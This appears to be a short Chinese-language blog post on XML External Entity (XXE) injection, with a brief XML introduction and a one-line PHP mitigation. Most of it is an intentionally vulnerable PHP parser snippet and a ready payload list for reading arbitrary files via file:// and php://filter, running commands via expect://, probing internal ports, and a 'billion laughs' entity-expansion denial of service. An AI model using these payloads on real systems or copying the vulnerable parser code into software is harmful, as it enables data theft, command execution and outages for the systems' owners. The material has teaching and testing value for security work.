XXE
可扩展标记语言(英语:Extensible Markup Language,简称:XML)是一种标记语言,是从标准通用标记语言(SGML)中简化修改出来的。它主要用到的有可扩展标记语言、可扩展样式语言(XSL)、XBRL和XPath等。
XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。
当允许外部的xml文档被引用时,攻击者可以通过构造含有恶意内容的xml文档,来实现文件读取,命令执行,端口扫描,DDOS等攻击
在php中可以将libxml_disable_entity_loader配置设置为true来禁止使用外部xml文档
PHP源码
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo $creds;
?>
Payload
-----------------------任意文件读取-----------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource= 目标文件的绝对路径 " > ]>
<abc>&xxe;</abc>
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "file:///目标文件的绝对路径" > ]>
<abc>&xxe;</abc>
------------------------命令执行--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "expect://系统命令 " > ]>
<abc>&xxe;</abc>
------------------------探测端口--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]>
<abc>&xxe;</abc>
-------------------------DDOS----------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<abc>&lol9;</abc>
发现沙发条评论